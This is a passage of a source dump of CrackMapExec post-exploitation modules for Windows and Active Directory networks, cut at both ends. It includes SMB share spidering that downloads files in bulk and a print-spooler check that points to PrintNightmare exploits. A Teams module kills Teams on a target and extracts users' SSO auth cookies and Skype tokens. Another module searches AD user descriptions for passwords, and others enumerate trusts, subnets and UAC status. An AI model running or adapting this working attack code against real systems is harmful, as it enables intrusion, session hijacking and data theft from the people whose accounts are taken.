file in share \"{share_name}\": \"{next_fullpath}\"')\r\n self.parse_file(share_name, next_fullpath, result)\r\n\r\n def parse_file(self, share_name, file_path, file_info):\r\n \"\"\"This function checks file attributes against various filters, records file metadata,\r\n and downloads eligible files if the download flag is set.\r\n \"\"\"\r\n\r\n # Record the file metadata\r\n file_size = file_info.get_filesize()\r\n file_creation_time = file_info.get_ctime_epoch()\r\n file_modified_time = file_info.get_mtime_epoch()\r\n file_access_time = file_info.get_atime_epoch()\r\n self.results[share_name][file_path] = {\r\n \"size\": human_size(file_size),\r\n \"ctime_epoch\": human_time(file_creation_time),\r\n \"mtime_epoch\": human_time(file_modified_time),\r\n \"atime_epoch\": human_time(file_access_time),\r\n }\r\n self.stats[\"file_sizes\"].append(file_size)\r\n\r\n # Check if proceeding with download attempt.\r\n if not self.download_flag:\r\n return\r\n\r\n # Check file extension filter.\r\n _, file_extension = os.path.splitext(file_path)\r\n if file_extension:\r\n self.stats[\"file_exts\"].add(file_extension.lower())\r\n if file_extension.lower() in self.exclude_exts:\r\n self.logger.info(f'The file \"{file_path}\" has an excluded extension.')\r\n self.stats[\"num_files_filtered\"] += 1\r\n return\r\n\r\n # Check file size limits.\r\n if file_size > self.max_file_size:\r\n self.logger.info(f\"File {file_path} has size {human_size(file_size)} > max size {human_size(self.max_file_size)}.\")\r\n self.stats[\"num_files_filtered\"] += 1\r\n return\r\n\r\n # Check if the remote file is readable.\r\n remote_file = self.get_remote_file(share_name, file_path)\r\n if not remote_file:\r\n self.logger.fail(f'Cannot read remote file \"{file_path}\".')\r\n self.stats[\"num_get_fail\"] += 1\r\n return\r\n\r\n # Check if the file is already downloaded and up-to-date.\r\n file_dir, file_name = self.get_file_save_path(remote_file)\r\n download_path = os.path.join(file_dir, file_name)\r\n needs_update_flag = False\r\n if os.path.exists(download_path):\r\n if file_modified_time <= os.stat(download_path).st_mtime and os.path.getsize(download_path) == file_size:\r\n self.logger.info(f'File already downloaded \"{file_path}\" => \"{download_path}\".')\r\n self.stats[\"num_files_unmodified\"] += 1\r\n return\r\n else:\r\n needs_update_flag = True\r\n\r\n # Download file.\r\n download_success = False\r\n try:\r\n self.logger.info(f'Downloading file \"{file_path}\" => \"{download_path}\".')\r\n remote_file.open()\r\n self.save_file(remote_file, share_name)\r\n remote_file.close()\r\n download_success = True\r\n except SessionError as e:\r\n if \"STATUS_SHARING_VIOLATION\" in str(e):\r\n pass\r\n except Exception as e:\r\n self.logger.fail(f'Failed to download file \"{file_path}\". Error: {str(e)}')\r\n\r\n # Increment stats counters\r\n if download_success:\r\n self.stats[\"num_get_success\"] += 1\r\n if needs_update_flag:\r\n self.stats[\"num_files_updated\"] += 1\r\n else:\r\n self.stats[\"num_get_fail\"] += 1\r\n\r\n def save_file(self, remote_file, share_name):\r\n \"\"\"This function reads the `remote_file` in chunks using the `read_chunk` method.\r\n Each chunk is then written to the local file until the entire file is saved.\r\n It handles cases where the file remains empty due to errors.\r\n \"\"\"\r\n\r\n # Reset the remote_file to point to the beginning of the file.\r\n remote_file.seek(0, 0)\r\n\r\n folder, filename = self.get_file_save_path(remote_file)\r\n download_path = os.path.join(folder, filename)\r\n\r\n # Create the subdirectories based on the share name and file path.\r\n self.logger.debug(f'Create folder \"{folder}\"')\r\n make_dirs(folder)\r\n\r\n try:\r\n with open(download_path, \"wb\") as fd:\r\n while True:\r\n chunk = self.read_chunk(remote_file)\r\n if not chunk:\r\n break\r\n fd.write(chunk)\r\n except Exception as e:\r\n self.logger.fail(f'Error writing file \"{remote_path}\" from share \"{share_name}\": {e}')\r\n\r\n # Check if the file is empty and should not be.\r\n if os.path.getsize(download_path) == 0 and remote_file.get_filesize() > 0:\r\n os.remove(download_path)\r\n remote_path = str(remote_file)[2:]\r\n self.logger.fail(f'Unable to download file \"{remote_path}\".')\r\n\r\n def dump_folder_metadata(self, results):\r\n \"\"\"This function takes the metadata results as input and writes them to a JSON file\r\n in the `self.output_folder`. The results are formatted with indentation and\r\n sorted keys before being written to the file.\r\n \"\"\"\r\n metadata_path = os.path.join(self.output_folder, f\"{self.host}.json\")\r\n try:\r\n with open(metadata_path, \"w\", encoding=\"utf-8\") as fd:\r\n fd.write(json.dumps(results, indent=4, sort_keys=True))\r\n self.logger.success(f'Saved share-file metadata to \"{metadata_path}\".')\r\n except Exception as e:\r\n self.logger.fail(f\"Failed to save share metadata: {str(e)}\")\r\n\r\n def print_stats(self):\r\n \"\"\"This function prints the statistics during processing.\"\"\"\r\n\r\n # Share statistics.\r\n shares = self.stats.get(\"shares\", [])\r\n if shares:\r\n num_shares = len(shares)\r\n shares_str = \", \".join(shares)\r\n self.logger.display(f\"SMB Shares: {num_shares} ({shares_str})\")\r\n shares_readable = self.stats.get(\"shares_readable\", [])\r\n if shares_readable:\r\n num_readable_shares = len(shares_readable)\r\n if len(shares_readable) > 10:\r\n shares_readable_str = \", \".join(shares_readable[:10]) + \"...\"\r\n else:\r\n shares_readable_str = \", \".join(shares_readable)\r\n self.logger.display(f\"SMB Readable Shares: {num_readable_shares} ({shares_readable_str})\")\r\n shares_writable = self.stats.get(\"shares_writable\", [])\r\n if shares_writable:\r\n num_writable_shares = len(shares_writable)\r\n if len(shares_writable) > 10:\r\n shares_writable_str = \", \".join(shares_writable[:10]) + \"...\"\r\n else:\r\n shares_writable_str = \", \".join(shares_writable)\r\n self.logger.display(f\"SMB Writable Shares: {num_writable_shares} ({shares_writable_str})\")\r\n num_shares_filtered = self.stats.get(\"num_shares_filtered\", 0)\r\n if num_shares_filtered:\r\n self.logger.display(f\"SMB Filtered Shares: {num_shares_filtered}\")\r\n\r\n # Folder statistics.\r\n num_folders = self.stats.get(\"num_folders\", 0)\r\n self.logger.display(f\"Total folders found: {num_folders}\")\r\n num_folders_filtered = self.stats.get(\"num_folders_filtered\", 0)\r\n if num_folders_filtered:\r\n num_filtered_folders = len(num_folders_filtered)\r\n self.logger.display(f\"Folders Filtered: {num_filtered_folders}\")\r\n\r\n # File statistics.\r\n num_files = self.stats.get(\"num_files\", 0)\r\n self.logger.display(f\"Total files found: {num_files}\")\r\n num_files_filtered = self.stats.get(\"num_files_filtered\", 0)\r\n if num_files_filtered:\r\n self.logger.display(f\"Files filtered: {num_files_filtered}\")\r\n if num_files == 0:\r\n return\r\n\r\n # File sizing statistics.\r\n file_sizes = self.stats.get(\"file_sizes\", [])\r\n if file_sizes:\r\n total_file_size = sum(file_sizes)\r\n min_file_size = min(file_sizes)\r\n max_file_size = max(file_sizes)\r\n average_file_size = total_file_size / num_files\r\n self.logger.display(f\"File size average: {human_size(average_file_size)}\")\r\n self.logger.display(f\"File size min: {human_size(min_file_size)}\")\r\n self.logger.display(f\"File size max: {human_size(max_file_size)}\")\r\n\r\n # Extension statistics.\r\n file_exts = list(self.stats.get(\"file_exts\", []))\r\n if file_exts:\r\n num_unique_file_exts = len(file_exts)\r\n if len(file_exts) > 10:\r\n unique_exts_str = \", \".join(file_exts[:10]) + \"...\"\r\n else:\r\n unique_exts_str = \", \".join(file_exts)\r\n self.logger.display(f\"File unique exts: {num_unique_file_exts} ({unique_exts_str})\")\r\n\r\n # Download statistics.\r\n if self.download_flag:\r\n num_get_success = self.stats.get(\"num_get_success\", 0)\r\n if num_get_success:\r\n self.logger.display(f\"Downloads successful: {num_get_success}\")\r\n num_get_fail = self.stats.get(\"num_get_fail\", 0)\r\n if num_get_fail:\r\n self.logger.display(f\"Downloads failed: {num_get_fail}\")\r\n num_files_unmodified = self.stats.get(\"num_files_unmodified\", 0)\r\n if num_files_unmodified:\r\n self.logger.display(f\"Unmodified files: {num_files_unmodified}\")\r\n num_files_updated = self.stats.get(\"num_files_updated\", 0)\r\n if num_files_updated:\r\n self.logger.display(f\"Updated files: {num_files_updated}\")\r\n if num_files_unmodified and not num_files_updated:\r\n self.logger.display(\"All files were not changed.\")\r\n if num_files_filtered == num_files:\r\n self.logger.display(\"All files were ignored.\")\r\n if num_get_fail == 0:\r\n self.logger.success(\"All files processed successfully.\")\r\n\r\n\r\nclass CMEModule:\r\n \"\"\"\r\n Spider plus module\r\n Module by @vincd\r\n Updated by @godylockz\r\n \"\"\"\r\n\r\n name = \"spider_plus\"\r\n description = \"List files recursively (excluding `EXCLUDE_FILTER` and `EXCLUDE_EXTS` extensions) and save JSON share-file metadata to the `OUTPUT_FOLDER`. If `DOWNLOAD_FLAG`=True, download files smaller then `MAX_FILE_SIZE` to the `OUTPUT_FOLDER`.\"\r\n supported_protocols = [\"smb\"]\r\n opsec_safe = True # Does the module touch disk?\r\n multiple_hosts = True # Does the module support multiple hosts?\r\n\r\n def options(self, context, module_options):\r\n \"\"\"\r\n DOWNLOAD_FLAG Download all share folders/files (Default: False)\r\n STATS_FLAG Disable file/download statistics (Default: True)\r\n EXCLUDE_EXTS Case-insensitive extension filter to exclude (Default: ico,lnk)\r\n EXCLUDE_FILTER Case-insensitive filter to exclude folders/files (Default: print$,ipc$)\r\n MAX_FILE_SIZE Max file size to download (Default: 51200)\r\n OUTPUT_FOLDER Path of the local folder to save files (Default: /tmp/cme_spider_plus)\r\n \"\"\"\r\n self.download_flag = False\r\n if any(\"DOWNLOAD\" in key for key in module_options.keys()):\r\n self.download_flag = True\r\n self.stats_flag = True\r\n if any(\"STATS\" in key for key in module_options.keys()):\r\n self.stats_flag = False\r\n self.exclude_exts = get_list_from_option(module_options.get(\"EXCLUDE_EXTS\", \"ico,lnk\"))\r\n self.exclude_exts = [d.lower() for d in self.exclude_exts] # force case-insensitive\r\n self.exclude_filter = get_list_from_option(module_options.get(\"EXCLUDE_FILTER\", \"print$,ipc$\"))\r\n self.exclude_filter = [d.lower() for d in self.exclude_filter] # force case-insensitive\r\n self.max_file_size = int(module_options.get(\"MAX_FILE_SIZE\", 50 * 1024))\r\n self.output_folder = module_options.get(\"OUTPUT_FOLDER\", os.path.join(\"/tmp\", \"cme_spider_plus\"))\r\n\r\n\r\n def on_login(self, context, connection):\r\n context.log.display(\"Started module spidering_plus with the following options:\")\r\n context.log.display(f\" DOWNLOAD_FLAG: {self.download_flag}\")\r\n context.log.display(f\" STATS_FLAG: {self.stats_flag}\")\r\n context.log.display(f\"EXCLUDE_FILTER: {self.exclude_filter}\")\r\n context.log.display(f\" EXCLUDE_EXTS: {self.exclude_exts}\")\r\n context.log.display(f\" MAX_FILE_SIZE: {human_size(self.max_file_size)}\")\r\n context.log.display(f\" OUTPUT_FOLDER: {self.output_folder}\")\r\n\r\n spider = SMBSpiderPlus(\r\n connection,\r\n context.log,\r\n self.download_flag,\r\n self.stats_flag,\r\n self.exclude_exts,\r\n self.exclude_filter,\r\n self.max_file_size,\r\n self.output_folder,\r\n )\r\n\r\n spider.spider_shares()\r\n" }, { "path": "cme/modules/spooler.py", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n# https://raw.githubusercontent.com/SecureAuthCorp/impacket/master/examples/rpcdump.py\nfrom impacket import uuid\nfrom impacket.dcerpc.v5 import transport, epm\nfrom impacket.dcerpc.v5.rpch import (\n RPC_PROXY_INVALID_RPC_PORT_ERR,\n RPC_PROXY_CONN_A1_0X6BA_ERR,\n RPC_PROXY_CONN_A1_404_ERR,\n RPC_PROXY_RPC_OUT_DATA_404_ERR,\n)\n\nKNOWN_PROTOCOLS = {\n 135: {\"bindstr\": r\"ncacn_ip_tcp:%s[135]\"},\n 445: {\"bindstr\": r\"ncacn_np:%s[\\pipe\\epmapper]\"},\n}\n\n\nclass CMEModule:\n \"\"\"\n For printnightmare: detect if print spooler is enabled or not. Then use @cube0x0's project https://github.com/cube0x0/CVE-2021-1675 or Mimikatz from Benjamin Delpy\n Module by @mpgn_x64\n \"\"\"\n\n name = \"spooler\"\n description = \"Detect if print spooler is enabled or not\"\n supported_protocols = [\"smb\", \"wmi\"]\n opsec_safe = True\n multiple_hosts = True\n\n def __init__(self, context=None, module_options=None):\n self.context = context\n self.module_options = module_options\n self.__string_binding = None\n self.port = None\n\n def options(self, context, module_options):\n \"\"\"\n PORT Port to check (defaults to 135)\n \"\"\"\n self.port = 135\n if \"PORT\" in module_options:\n self.port = int(module_options[\"PORT\"])\n\n def on_login(self, context, connection):\n entries = []\n lmhash = getattr(connection, \"lmhash\", \"\")\n nthash = getattr(connection, \"nthash\", \"\")\n\n self.__stringbinding = KNOWN_PROTOCOLS[self.port][\"bindstr\"] % connection.host\n context.log.debug(\"StringBinding %s\" % self.__stringbinding)\n rpctransport = transport.DCERPCTransportFactory(self.__stringbinding)\n rpctransport.set_credentials(connection.username, connection.password, connection.domain, lmhash, nthash)\n rpctransport.setRemoteHost(connection.host if not connection.kerberos else connection.hostname + \".\" + connection.domain)\n rpctransport.set_dport(self.port)\n\n if connection.kerberos:\n rpctransport.set_kerberos(connection.kerberos, connection.kdcHost)\n\n try:\n entries = self.__fetch_list(rpctransport)\n except Exception as e:\n error_text = \"Protocol failed: %s\" % e\n context.log.critical(error_text)\n\n if RPC_PROXY_INVALID_RPC_PORT_ERR in error_text or RPC_PROXY_RPC_OUT_DATA_404_ERR in error_text or RPC_PROXY_CONN_A1_404_ERR in error_text or RPC_PROXY_CONN_A1_0X6BA_ERR in error_text:\n context.log.critical(\"This usually means the target does not allow \" \"to connect to its epmapper using RpcProxy.\")\n return\n\n # Display results.\n endpoints = {}\n # Let's group the UUIDS\n for entry in entries:\n binding = epm.PrintStringBinding(entry[\"tower\"][\"Floors\"])\n tmp_uuid = str(entry[\"tower\"][\"Floors\"][0])\n if (tmp_uuid in endpoints) is not True:\n endpoints[tmp_uuid] = {}\n endpoints[tmp_uuid][\"Bindings\"] = list()\n if uuid.uuidtup_to_bin(uuid.string_to_uuidtup(tmp_uuid))[:18] in epm.KNOWN_UUIDS:\n endpoints[tmp_uuid][\"EXE\"] = epm.KNOWN_UUIDS[uuid.uuidtup_to_bin(uuid.string_to_uuidtup(tmp_uuid))[:18]]\n else:\n endpoints[tmp_uuid][\"EXE\"] = \"N/A\"\n endpoints[tmp_uuid][\"annotation\"] = entry[\"annotation\"][:-1].decode(\"utf-8\")\n endpoints[tmp_uuid][\"Bindings\"].append(binding)\n\n if tmp_uuid[:36] in epm.KNOWN_PROTOCOLS:\n endpoints[tmp_uuid][\"Protocol\"] = epm.KNOWN_PROTOCOLS[tmp_uuid[:36]]\n else:\n endpoints[tmp_uuid][\"Protocol\"] = \"N/A\"\n\n for endpoint in list(endpoints.keys()):\n if \"MS-RPRN\" in endpoints[endpoint][\"Protocol\"]:\n context.log.debug(\"Protocol: %s \" % endpoints[endpoint][\"Protocol\"])\n context.log.debug(\"Provider: %s \" % endpoints[endpoint][\"EXE\"])\n context.log.debug(\"UUID : %s %s\" % (endpoint, endpoints[endpoint][\"annotation\"]))\n context.log.debug(\"Bindings: \")\n for binding in endpoints[endpoint][\"Bindings\"]:\n context.log.debug(\" %s\" % binding)\n context.log.debug(\"\")\n context.log.highlight(\"Spooler service enabled\")\n try:\n host = context.db.get_hosts(connection.host)[0]\n context.db.add_host(\n host.ip,\n host.hostname,\n host.domain,\n host.os,\n host.smbv1,\n host.signing,\n spooler=True,\n )\n except Exception as e:\n context.log.debug(f\"Error updating spooler status in database\")\n break\n\n if entries:\n num = len(entries)\n if 1 == num:\n context.log.debug(f\"[Spooler] Received one endpoint\")\n else:\n context.log.debug(f\"[Spooler] Received {num} endpoints\")\n else:\n context.log.debug(f\"[Spooler] No endpoints found\")\n\n def __fetch_list(self, rpctransport):\n dce = rpctransport.get_dce_rpc()\n dce.connect()\n resp = epm.hept_lookup(None, dce=dce)\n dce.disconnect()\n return resp\n" }, { "path": "cme/modules/subnets.py", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom impacket.ldap import ldapasn1 as ldapasn1_impacket\n\n\ndef searchResEntry_to_dict(results):\n data = {}\n for attr in results[\"attributes\"]:\n key = str(attr[\"type\"])\n value = str(attr[\"vals\"][0])\n data[key] = value\n return data\n\n\nclass CMEModule:\n \"\"\"\n Retrieves the different Sites and Subnets of an Active Directory\n\n Authors:\n Podalirius: @podalirius_\n \"\"\"\n\n def options(self, context, module_options):\n \"\"\"\n showservers Toggle printing of servers (default: true)\n \"\"\"\n\n self.showservers = True\n self.base_dn = None\n\n if module_options and \"SHOWSERVERS\" in module_options:\n if module_options[\"SHOWSERVERS\"].lower() == \"true\" or module_options[\"SHOWSERVERS\"] == \"1\":\n self.showservers = True\n elif module_options[\"SHOWSERVERS\"].lower() == \"false\" or module_options[\"SHOWSERVERS\"] == \"0\":\n self.showservers = False\n else:\n print(\"Could not parse showservers option.\")\n if module_options and \"BASE_DN\" in module_options:\n self.base_dn = module_options[\"BASE_DN\"]\n\n name = \"subnets\"\n description = \"Retrieves the different Sites and Subnets of an Active Directory\"\n supported_protocols = [\"ldap\"]\n opsec_safe = True\n multiple_hosts = False\n\n def on_login(self, context, connection):\n dn = connection.ldapConnection._baseDN if self.base_dn is None else self.base_dn\n\n context.log.display(\"Getting the Sites and Subnets from domain\")\n\n try:\n list_sites = connection.ldapConnection.search(\n searchBase=\"CN=Configuration,%s\" % dn,\n searchFilter=\"(objectClass=site)\",\n attributes=[\"distinguishedName\", \"name\", \"description\"],\n sizeLimit=999,\n )\n except LDAPSearchError as e:\n context.log.fail(str(e))\n exit()\n for site in list_sites:\n if isinstance(site, ldapasn1_impacket.SearchResultEntry) is not True:\n continue\n site = searchResEntry_to_dict(site)\n site_dn = site[\"distinguishedName\"]\n site_name = site[\"name\"]\n site_description = \"\"\n if \"description\" in site.keys():\n site_description = site[\"description\"]\n # Getting subnets of this site\n list_subnets = connection.ldapConnection.search(\n searchBase=\"CN=Sites,CN=Configuration,%s\" % dn,\n searchFilter=\"(siteObject=%s)\" % site_dn,\n attributes=[\"distinguishedName\", \"name\"],\n sizeLimit=999,\n )\n if len([subnet for subnet in list_subnets if isinstance(subnet, ldapasn1_impacket.SearchResultEntry)]) == 0:\n context.log.highlight('Site \"%s\"' % site_name)\n else:\n for subnet in list_subnets:\n if isinstance(subnet, ldapasn1_impacket.SearchResultEntry) is not True:\n continue\n subnet = searchResEntry_to_dict(subnet)\n subnet_dn = subnet[\"distinguishedName\"]\n subnet_name = subnet[\"name\"]\n\n if self.showservers:\n # Getting machines in these subnets\n list_servers = connection.ldapConnection.search(\n searchBase=site_dn,\n searchFilter=\"(objectClass=server)\",\n attributes=[\"cn\"],\n sizeLimit=999,\n )\n if len([server for server in list_servers if isinstance(server, ldapasn1_impacket.SearchResultEntry)]) == 0:\n if len(site_description) != 0:\n context.log.highlight('Site \"%s\" (Subnet:%s) (description:\"%s\")' % (site_name, subnet_name, site_description))\n else:\n context.log.highlight('Site \"%s\" (Subnet:%s)' % (site_name, subnet_name))\n else:\n for server in list_servers:\n if isinstance(server, ldapasn1_impacket.SearchResultEntry) is not True:\n continue\n server = searchResEntry_to_dict(server)[\"cn\"]\n if len(site_description) != 0:\n context.log.highlight(\n 'Site \"%s\" (Subnet:%s) (description:\"%s\") (Server:%s)'\n % (\n site_name,\n subnet_name,\n site_description,\n server,\n )\n )\n else:\n context.log.highlight('Site \"%s\" (Subnet:%s) (Server:%s)' % (site_name, subnet_name, server))\n else:\n if len(site_description) != 0:\n context.log.highlight('Site \"%s\" (Subnet:%s) (description:\"%s\")' % (site_name, subnet_name, site_description))\n else:\n context.log.highlight('Site \"%s\" (Subnet:%s)' % (site_name, subnet_name))\n" }, { "path": "cme/modules/teams_localdb.py", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport sqlite3\n\n\nclass CMEModule:\n name = \"teams_localdb\"\n description = \"Retrieves the cleartext ssoauthcookie from the local Microsoft Teams database, if teams is open we kill all Teams process\"\n supported_protocols = [\"smb\"]\n opsec_safe = True\n multiple_hosts = False\n\n def options(self, context, module_options):\n \"\"\" \"\"\"\n\n def on_admin_login(self, context, connection):\n context.log.display(\"Killing all Teams process to open the cookie file\")\n connection.execute(\"taskkill /F /T /IM teams.exe\")\n # sleep(3)\n found = 0\n paths = connection.spider(\"C$\", folder=\"Users\", regex=[\"[a-zA-Z0-9]*\"], depth=0)\n with open(\"/tmp/teams_cookies2.txt\", \"wb\") as f:\n for path in paths:\n try:\n connection.conn.getFile(\"C$\", path + \"/AppData/Roaming/Microsoft/Teams/Cookies\", f.write)\n context.log.highlight(\"Found Cookie file in path \" + path)\n found = 1\n self.parse_file(context, \"skypetoken_asm\")\n self.parse_file(context, \"SSOAUTHCOOKIE\")\n f.seek(0)\n f.trunkate()\n except Exception as e:\n if \"STATUS_SHARING_VIOLATION\" in str(e):\n context.log.debug(str(e))\n context.log.highlight(\"Found Cookie file in path \" + path)\n context.log.fail(\"Cannot retrieve file, most likely Teams is running which prevents us from retrieving the Cookies database\")\n if found == 0:\n context.log.display(\"No cookie file found in Users folder\")\n\n @staticmethod\n def parse_file(context, name):\n try:\n conn = sqlite3.connect(\"/tmp/teams_cookies2.txt\")\n c = conn.cursor()\n c.execute(\"SELECT value FROM cookies WHERE name = '\" + name + \"'\")\n row = c.fetchone()\n if row is None:\n context.log.fail(\"No \" + name + \" present in Microsoft Teams Cookies database\")\n else:\n context.log.success(\"Succesfully extracted \" + name + \": \")\n context.log.success(row[0])\n conn.close()\n except Exception as e:\n context.log.fail(str(e))\n" }, { "path": "cme/modules/test_connection.py", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom sys import exit\n\n\nclass CMEModule:\n \"\"\"\n Executes the Test-Connection PowerShell cmdlet\n Module by @byt3bl33d3r\n \"\"\"\n\n name = \"test_connection\"\n description = \"Pings a host\"\n supported_protocols = [\"smb\", \"mssql\"]\n opsec_safe = True\n multiple_hosts = True\n\n def options(self, context, module_options):\n \"\"\"\n HOST Host to ping\n \"\"\"\n self.host = None\n\n if \"HOST\" not in module_options:\n context.log.fail(\"HOST option is required!\")\n exit(1)\n\n self.host = module_options[\"HOST\"]\n\n def on_admin_login(self, context, connection):\n # $ProgressPreference = 'SilentlyContinue' prevents the \"preparing modules for the first time\" error\n command = f\"$ProgressPreference = 'SilentlyContinue'; Test-Connection {self.host} -quiet -count 1\"\n\n output = connection.ps_execute(command, get_output=True)[0]\n\n context.log.debug(f\"Output: {output}\")\n context.log.debug(f\"Type: {type(output)}\")\n\n if output == \"True\":\n context.log.success(\"Pinged successfully\")\n else:\n context.log.fail(\"Host unreachable\")\n" }, { "path": "cme/modules/trust.py", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nclass CMEModule:\n '''\n Extract all Trust Relationships, Trusting Direction, and Trust Transitivity\n Module by Brandon Fisher @shad0wcntr0ller\n '''\n name = 'enum_trusts'\n description = 'Extract all Trust Relationships, Trusting Direction, and Trust Transitivity'\n supported_protocols = ['ldap']\n opsec_safe = True\n multiple_hosts = True\n\n def options(self, context, module_options):\n pass\n\n def on_login(self, context, connection):\n domain_dn = ','.join(['DC=' + dc for dc in connection.domain.split('.')])\n search_filter = '(&(objectClass=trustedDomain))'\n attributes = ['flatName', 'trustPartner', 'trustDirection', 'trustAttributes'] \n\n context.log.debug(f'Search Filter={search_filter}')\n resp = connection.ldapConnection.search(searchBase=domain_dn, searchFilter=search_filter, attributes=attributes, sizeLimit=0)\n\n trusts = []\n context.log.debug(f'Total of records returned {len(resp)}')\n for item in resp:\n if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:\n continue\n flat_name = ''\n trust_partner = ''\n trust_direction = ''\n trust_transitive = [] \n try:\n for attribute in item['attributes']:\n if str(attribute['type']) == 'flatName':\n flat_name = str(attribute['vals'][0])\n elif str(attribute['type']) == 'trustPartner':\n trust_partner = str(attribute['vals'][0])\n elif str(attribute['type']) == 'trustDirection':\n if str(attribute['vals'][0]) == '1':\n trust_direction = 'Inbound'\n elif str(attribute['vals'][0]) == '2':\n trust_direction = 'Outbound'\n elif str(attribute['vals'][0]) == '3':\n trust_direction = 'Bidirectional'\n elif str(attribute['type']) == 'trustAttributes': \n trust_attributes_value = int(attribute['vals'][0])\n if trust_attributes_value & 0x1:\n trust_transitive.append('Non-Transitive')\n if trust_attributes_value & 0x2:\n trust_transitive.append('Uplevel-Only')\n if trust_attributes_value & 0x4:\n trust_transitive.append('Quarantined Domain')\n if trust_attributes_value & 0x8:\n trust_transitive.append('Forest Transitive')\n if trust_attributes_value & 0x10:\n trust_transitive.append('Cross Organization')\n if trust_attributes_value & 0x20:\n trust_transitive.append('Within Forest')\n if trust_attributes_value & 0x40:\n trust_transitive.append('Treat as External')\n if trust_attributes_value & 0x80:\n trust_transitive.append('Uses RC4 Encryption')\n if trust_attributes_value & 0x100:\n trust_transitive.append('Cross Organization No TGT Delegation')\n if trust_attributes_value & 0x2000:\n trust_transitive.append('PAM Trust')\n if not trust_transitive:\n trust_transitive.append('Other')\n trust_transitive = ', '.join(trust_transitive)\n\n if flat_name and trust_partner and trust_direction and trust_transitive:\n trusts.append((flat_name, trust_partner, trust_direction, trust_transitive))\n except Exception as e:\n context.log.debug(f'Cannot process trust relationship due to error {e}')\n pass\n\n if trusts:\n context.log.success('Found the following trust relationships:')\n for trust in trusts:\n context.log.highlight(f'{trust[1]} -> {trust[2]} -> {trust[3]}')\n else:\n context.log.display('No trust relationships found')\n\n return True\n\n" }, { "path": "cme/modules/uac.py", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nimport logging\n\nfrom impacket.dcerpc.v5 import rrp\nfrom impacket.examples.secretsdump import RemoteOperations\n\n\nclass CMEModule:\n name = \"uac\"\n description = \"Checks UAC status\"\n supported_protocols = [\"smb\"]\n opsec_safe = True\n multiple_hosts = True\n\n def __init__(self, context=None, module_options=None):\n self.context = context\n self.module_options = module_options\n logging.debug(\"test\")\n\n def options(self, context, module_options):\n \"\"\" \"\"\"\n\n def on_admin_login(self, context, connection):\n remoteOps = RemoteOperations(connection.conn, False)\n remoteOps.enableRegistry()\n\n ans = rrp.hOpenLocalMachine(remoteOps._RemoteOperations__rrp)\n regHandle = ans[\"phKey\"]\n ans = rrp.hBaseRegOpenKey(\n remoteOps._RemoteOperations__rrp,\n regHandle,\n \"SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\",\n )\n keyHandle = ans[\"phkResult\"]\n dataType, uac_value = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, \"EnableLUA\")\n\n if uac_value == 1:\n context.log.highlight(\"UAC Status: 1 (UAC Enabled)\")\n elif uac_value == 0:\n context.log.highlight(\"UAC Status: 0 (UAC Disabled)\")\n\n rrp.hBaseRegCloseKey(remoteOps._RemoteOperations__rrp, keyHandle)\n remoteOps.finish()\n" }, { "path": "cme/modules/user_desc.py", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom pathlib import Path\nfrom datetime import datetime\nfrom impacket.ldap import ldap, ldapasn1\nfrom impacket.ldap.ldap import LDAPSearchError\n\n\nclass CMEModule:\n \"\"\"\n Get user descriptions stored in Active Directory.\n\n Module by Tobias Neitzel (@qtc_de)\n \"\"\"\n\n name = \"user-desc\"\n description = \"Get user descriptions stored in Active Directory\"\n supported_protocols = [\"ldap\"]\n opsec_safe = True\n multiple_hosts = True\n\n def __init__(self, context=None, multiple_options=None):\n self.keywords = None\n self.search_filter = None\n self.account_names = None\n self.context = None\n self.desc_count = None\n self.log_file = None\n\n def options(self, context, module_options):\n \"\"\"\n LDAP_FILTER Custom LDAP search filter (fully replaces the default search)\n DESC_FILTER An additional seach filter for descriptions (supports wildcard *)\n DESC_INVERT An additional seach filter for descriptions (shows non matching)\n USER_FILTER An additional seach filter for usernames (supports wildcard *)\n USER_INVERT An additional seach filter for usernames (shows non matching)\n KEYWORDS Use a custom set of keywords (comma separated)\n ADD_KEYWORDS Add additional keywords to the default set (comma separated)\n \"\"\"\n self.log_file = None\n self.desc_count = 0\n self.context = context\n self.account_names = set()\n self.keywords = {\"pass\", \"creds\", \"creden\", \"key\", \"secret\", \"default\"}\n\n if \"LDAP_FILTER\" in module_options:\n self.search_filter = module_options[\"LDAP_FILTER\"]\n else:\n self.search_filter = \"(&(objectclass=user)\"\n\n if \"DESC_FILTER\" in module_options:\n self.search_filter += f\"(description={module_options['DESC_FILTER']})\"\n\n if \"DESC_INVERT\" in module_options:\n self.search_filter += f\"(!(description={module_options['DESC_INVERT']}))\"\n\n if \"USER_FILTER\" in module_options:\n self.search_filter += f\"(sAMAccountName={module_options['USER_FILTER']})\"\n\n if \"USER_INVERT\" in module_options:\n self.search_filter += f\"(!(sAMAccountName={module_options['USER_INVERT']}))\"\n\n self.search_filter += \")\"\n\n if \"KEYWORDS\" in module_options:\n self.keywords = set(module_options[\"KEYWORDS\"].split(\",\"))\n elif \"ADD_KEYWORDS\" in module_options:\n add_keywords = set(module_options[\"ADD_KEYWORDS\"].split(\",\"))\n self.keywords = self.keywords.union(add_keywords)\n\n def on_login(self, context, connection):\n \"\"\"\n On successful LDAP login we perform a search for all user objects that have a description.\n Users can specify additional LDAP filters that are applied to the query.\n \"\"\"\n self.create_log_file(connection.conn.getRemoteHost(), datetime.now().strftime(\"%Y%m%d_%H%M%S\"))\n context.log.info(f\"Starting LDAP search with search filter '{self.search_filter}'\")\n\n try:\n sc = ldap.SimplePagedResultsControl()\n connection.ldapConnection.search(\n searchFilter=self.search_filter,\n attributes=[\"sAMAccountName\", \"description\"],\n sizeLimit=0,\n searchControls=[sc],\n perRecordCallback=self.process_record,\n )\n except LDAPSearchError as e:\n context.log.fail(f\"Obtained unexpected exception: {str(e)}\")\n finally:\n self.delete_log_file()\n\n def create_log_file(self, host, time):\n \"\"\"\n Create a log file for dumping user descriptions.\n \"\"\"\n logfile = f\"UserDesc-{host}-{time}.log\"\n logfile = 